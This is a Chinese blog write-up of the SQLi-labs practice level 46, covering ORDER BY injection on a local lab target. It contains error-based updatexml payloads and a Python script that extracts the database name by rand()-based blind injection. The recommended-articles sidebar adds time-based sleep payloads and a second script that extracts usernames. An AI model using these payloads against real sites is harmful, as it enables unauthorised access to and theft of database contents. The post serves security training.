SQLlabs46关

最新推荐文章于 2025-06-15 18:36:18 发布
最新推荐文章于 2025-06-15 18:36:18 发布
阅读量450 收藏 7
点赞数 9
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cxy020/article/details/136419670
版权
文章介绍了如何通过构造特定的SQL查询语句,利用rand()函数进行SQL注入,实现对数据库字段的探测和可能的权限获取,如admin3字段。作者提供了一个Python脚本实例,针对`http://127.0.0.1/sqli/Less-46/index.php`的Sqli漏洞进行测试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

如果我们直接用列去排序

?sort=username/password

username:

passward

可以看到顺序是不同的,当然第一列第二列第三列也可以,基本上都是这个原理,那怎么去实现注入呢,我们主要是通过rand()去实现一个盲注或者报错注入(如果打印报错)

报错注入;真的走第一个错的走第二个我们想走第二个,这样就可以实现

?sort=updatexml(1,if(1=2,1,concat(0x7e,database(),0x7e)),1)

我们通过找第一个字段,来爬取判断,为真的话是admin3,因为布尔true=3

# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/25 16:31
@version: 1.0
"""
import requests
import time
from bs4 import BeautifulSoup
 
 
"""
查表名
查列名
查具体字段内容
if(ascii(substr(database(),1,1))>100,%20sleep(3),%200)--+
if(ascii(substr(database(),1,1))>110, sleep(3), 0)
"""
def inject_database(url):
    name = ''
    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "rand(ascii(mid((select database()),%d,1)) > %d)" % (i, mid)
            res = {"sort": payload}
            r = requests.post(url, params=res)
            html = r.text
            soup = BeautifulSoup(html,'html.parser')
            getUsername = soup.find_all('td')[1].text
            if getUsername == 'admin3':
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
 
if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli/Less-46/index.php'
    inject_database(url)

SQL-Labs靶场“46-50”教程
钟言的博客
02-24 1万+
本篇为SQL-Labs靶场的第46到50教程,详细内容包含了:四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 四十七 ORDER BY单引号报错注入 1、源码分析 2、报错注入 3、时间盲注 三、四十八 ODRER BY数字型盲注 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 四、四十九 ORDER BY单引号盲注1、源码分析 2、时间盲注 五、五十 ORDER BY数字型堆叠注等
SQL-Labs46order by注入姿势
热门推荐
钟言的博客
02-24 1万+
为SQL-Labs的第46,order by注入,本篇以多种方法可以通,详细内容包含了四十六 ORDER BY数字型注入 1、源码分析 2、rand()盲注 3、if语句盲注 4、时间盲注 5、报错注入 6、Limit注入 7、盲注脚本等内容
sql-labs第46 order by盲注
ytdd66的博客
02-26 1422
来到了第46进入卡发现让我们输入的参数为sort,我们输入?sort=1尝试:输入?sort=2,3,发现表格按照顺序进行排列输出,明显是使用了order by相的函数。我们将参数变成1'进行尝试,就会报错:查看源码:通过asc 和desc查看返回数据是否相同来简单判断是否存在order by注入:分别显示升序和降序的表格,说明此处是注入点,即注入点在order by后的参数中,而order by不同于在where后的注入,不能使用union等进行注入。
sql-labs闯46~53
qq_44663230的博客
09-10 1405
sql-labs46~53 order by 排序注入
SQL-Labs46order by注入
weixin_63497480的博客
02-27 524
可以看出按照字母顺序进行了排序,所以它是一个使用了order by语句进行排序的查询的一种查询输出方式。从URL中可以看出传参的参数为SORT,下面我们令参数即sort为1继续尝试输入:?爆出数据库users表中的所有列。
sql-labs通讲解
qq_70836100的博客
07-22 1663
目录。
sqlilabs第46两种解法
m0_62738649的博客
02-21 386
第二种方法时间盲注法,我们可以将要查询的字母数字查询出来(可以用substr()函数截取)并比较界面的反应时间来判断是否猜中。延迟的时间并不是sleep(1)中的1秒,而是大于1秒。它与所查询的数据的条数是成倍数系的。可以知道它是按照我们输入的sort值来排序的。在写脚本时,可以添加timeout这一参数来避免延迟时间过长这一情况。计算公式:延迟时间=sleep(1)的秒数*所查询数据条数。如果查询的数据很多时,延迟的时间就会特别长。时,这时候发现屏幕上的显示的不是再是。注入就是通过可控制的位置在。
sqllabs less46~53
m0_51607644的博客
02-03 211
less46~49 order by注入 SQL语句$sql = “SELECT * FROM users ORDER BY $id”;我们可利用 order by 后的一些参数进行注入。 1.时间盲注 playload: ?sort=1 and if( left( (database()), 1) ='s' ,1,sleep(3))--+ 2.报错注入 playload:?sort=1 and updatexml(1,( select group_concat(0x7e,username,passw
sqli-labs靶场通攻略(46-50
Nai_zui_jiang的博客
08-29 762
输入?sort=1修改参数为2试一下1'出现报错,那么我们使用报错注入。
sql-labs闯46~53.html
12-29
【标签】中的“sqllabs”则是一个特定的标识,它可能指向一个专门讨论或练习SQL技能的在线社区、网站或项目。通过这个标签,用户可以快速定位到相的资源,找到志同道合的学习者或专业人士,共同交流学习心得与经验...
linux msyql8 允许远程连接
小妖666个人笔记
06-14 239
linux msyql8 允许远程连接
Linux爬虫系统从开始到部署成功全流程
weixin_44617651的博客
06-13 565
做过爬虫的都知道,很多公司都会有自己的专属技术人员以及服务器,通常情况下再部署爬虫前,首先要将准备好的inux服务器进行环境部署,并且要安装必要的爬虫技术栈,一切环境部署差不多了再去部署爬虫代码。下面就是我整理的一个真实案例,可以一起看看我从准到部署完成的具体流程。
linux-部署go开发环境
2501_92004703的博客
06-14 589
上述步骤完成了 Linux 系统中 go 开发环境的部署,包括创建目录、下载安装包、解压文件、配置环境变量等核心操作。最终通过go version命令验证了 go 1.24.3 版本的成功安装,确保go命令可在任意目录下执行。
从0开始学linux韦东山教程第四章问题小结(3)
weixin_52531699的博客
06-13 976
本文记录了学习Linux输入设备开发过程中遇到的问题及解决方案。重点注文本特性设置和VS Code调试技巧,通过分析/dev/input/event设备的读取程序,详细解析了输入设备信息获取的实现原理。程序使用ioctl系统调用获取设备标识和支持的事件类型,通过位操作解析事件位图。文章提供了完整的代码分析,包括头文件作用、数据结构说明和逐行逻辑解析,特别对EVIOCGID和EVIOCGBIT等键操作进行了重点说明,为嵌入式Linux输入设备开发提供了实用参考。
2025网络建设与运维技能大赛Linux部分CA服务器部署
网络安全、网络建设与运维竞赛资料培训请联系主页
06-13 639
CA(Certificate Authority,证书颁发机构)是负责签发和管理数字证书的机构。提供加密通信避免浏览器访问 HTTPS 出现“不受信任证书”警告实现内部服务的身份认证步骤内容安装 OpenSSL提供证书生成工具初始化 CA建立 CA 数据目录签发根证书CA 的身份凭证生成 CSR 请求模拟一个服务的证书申请签发用户证书有效期5年,支持通配符域名分发与信任将证书复制并追加到系统信任链中。
C语言:Linux libc和glibc的历史
最新发布
前进,才知道自己的渺小
06-15 412
libc用通常被用来指代标准C库的简称,即满足C语言标准的库,可供其他程序使用。但由于一些历史原因,它的概念出现了一些模糊,本文旨在帮助读者厘清这些概念。
LinuxLinux磁盘与链接
Antonio915的博客
06-13 700
磁盘存储与管理是计算机系统的重要组成部分。本文介绍了磁盘的基本结构、分区与格式化原理,以及Linux系统中的文件管理机制。 磁盘由多个同心圆磁道组成,数据以扇区为单位存储。为便于管理,磁盘被分区并格式化为Block Group结构,包含超级块、块组描述符、inode位图和数据区等组件。每个文件通过唯一的inode编号标识,存储属性和数据块位置信息。 软硬链接是Linux文件系统的特色功能。软链接类似快捷方式,存储目标文件路径,可以跨文件系统;硬链接则共享inode节点,删除源文件后数据仍可访问。通过stat
Linux 任务调度策略
休息一下接着来的博客
06-11 802
Linux内核提供了三种主要调度策略:SCHED_FIFO(先进先出实时调度)、SCHED_RR(轮转实时调度)和SCHED_OTHER(基于CFS的非实时调度)。SCHED_FIFO适用于硬实时任务,无时间片限制;SCHED_RR采用时间片轮转,兼顾实时性和公平性;SCHED_OTHER通过vruntime机制实现公平调度。实时调度策略需要root权限,优先级1-99,而非实时策略使用nice值调整优先级。选择策略需权衡实时性、公平性和风险,如SCHED_FIFO可能导致低优先级任务饿死,而SCHED_O
sqllabs第四
02-06
### 于SQL Labs 第四的解法 #### 背景介绍 SQL注入是一种常见的Web安全漏洞,攻击者通过向应用程序输入恶意SQL代码来操纵数据库执行未授权的操作。SQL Labs是一个用于练习和学习如何检测以及防御SQL注入的安全平台。 #### SQL Labs 第四概述 在这一中,目标是在给定的应用环境中利用SQL注入技术获取敏感数据或控制应用逻辑。根据已有的资料,在某些特定条件下,可能无法直接使用联合查询的方式来进行注入[^3]。 #### 技术细节与解决方案 由于本卡不允许返回额外的数据行(即不能用`UNION SELECT`),因此可以考虑采用基于布尔条件判断的方法——布尔盲注。这种方法依赖于程序响应的不同状态来推断后台数据库的信息。例如: 当尝试访问某个页面时,如果传入参数满足一定条件,则会显示正常的内容;如果不满足则不会有任何输出或者给出错误提示。此时可以通过改变请求中的变量值并观察服务器端反馈的变化情况来逐步构建完整的注入语句。 具体实现上,可以选择一些常用的MySQL内置函数作为辅助工具,比如`IF()`、`SLEEP()`等。下面是一段Python脚本示例,展示了如何自动化地实施这种类型的攻击: ```python import requests from string import ascii_lowercase, digits url = "http://example.com/vulnerable_page" characters = ascii_lowercase + digits # 字符集范围可以根据实际情况调整 result = "" for position in range(1, 20): # 假设最长用户名长度不超过20位 found_char = False for char in characters: payload = f"' OR IF(SUBSTRING((SELECT username FROM users LIMIT 1),{position},1)='{char}', SLEEP(5), 'false') -- " start_time = time.time() response = requests.get(url, params={"input": payload}) elapsed_time = time.time() - start_time if elapsed_time >= 5: # 如果延迟超过设定阈值,则认为找到了匹配字符 result += char print(f"[+] Found character at position {position}: '{char}'") found_char = True break if not found_char: break print("[*] Final extracted value:", result) ``` 此代码片段发送带有精心构造的有效载荷到易受攻击的服务端接口处,并测量每次请求所花费的时间。一旦发现异常延长时间的情况发生,就说明当前猜测的字符是正确的。 需要注意的是上述方法仅适用于存在时间差异反馈机制的情况下适用。实际操作过程中还需要结合具体的业务场景灵活运用不同的技巧完成挑战任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值